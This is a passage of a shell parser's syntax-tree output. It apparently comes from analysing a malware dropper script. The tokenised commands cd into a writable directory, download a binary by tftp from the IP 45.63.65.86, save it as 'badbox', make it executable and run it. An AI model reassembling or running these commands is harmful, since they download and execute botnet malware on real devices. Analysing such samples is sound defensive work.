  OperatorNode(lineno=15, op=';', pos=(1487, 1488)),
  CommandNode(lineno=15, pos=(1488, 1496), parts=[
    WordNode(lineno=15, pos=(1488, 1496), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1497, 1622), parts=[
  CommandNode(lineno=16, pos=(1497, 1504), parts=[
    WordNode(lineno=16, pos=(1497, 1499), word='cd'),
    WordNode(lineno=16, pos=(1500, 1504), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1505, 1507)),
  CommandNode(lineno=16, pos=(1508, 1519), parts=[
    WordNode(lineno=16, pos=(1508, 1510), word='cd'),
    WordNode(lineno=16, pos=(1511, 1519), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1520, 1522)),
  CommandNode(lineno=16, pos=(1523, 1530), parts=[
    WordNode(lineno=16, pos=(1523, 1525), word='cd'),
    WordNode(lineno=16, pos=(1526, 1530), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1531, 1533)),
  CommandNode(lineno=16, pos=(1534, 1542), parts=[
    WordNode(lineno=16, pos=(1534, 1536), word='cd'),
    WordNode(lineno=16, pos=(1537, 1542), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1543, 1545)),
  CommandNode(lineno=16, pos=(1546, 1550), parts=[
    WordNode(lineno=16, pos=(1546, 1548), word='cd'),
    WordNode(lineno=16, pos=(1549, 1550), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1550, 1551)),
  CommandNode(lineno=16, pos=(1552, 1582), parts=[
    WordNode(lineno=16, pos=(1552, 1556), word='tftp'),
    WordNode(lineno=16, pos=(1557, 1559), word='-r'),
    WordNode(lineno=16, pos=(1560, 1567), word='telnetd'),
    WordNode(lineno=16, pos=(1568, 1570), word='-g'),
    WordNode(lineno=16, pos=(1571, 1582), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1582, 1583)),
  CommandNode(lineno=16, pos=(1583, 1602), parts=[
    WordNode(lineno=16, pos=(1583, 1586), word='cat'),
    WordNode(lineno=16, pos=(1587, 1594), word='telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1596, 1602), word='badbox'), pos=(1595, 1602), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1602, 1603)),
  CommandNode(lineno=16, pos=(1603, 1613), parts=[
    WordNode(lineno=16, pos=(1603, 1608), word='chmod'),
    WordNode(lineno=16, pos=(1609, 1611), word='+x'),
    WordNode(lineno=16, pos=(1612, 1613), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1613, 1614)),
  CommandNode(lineno=16, pos=(1614, 1622), parts=[
    WordNode(lineno=16, pos=(1614, 1622), word='./badbox'),
  ]),
])
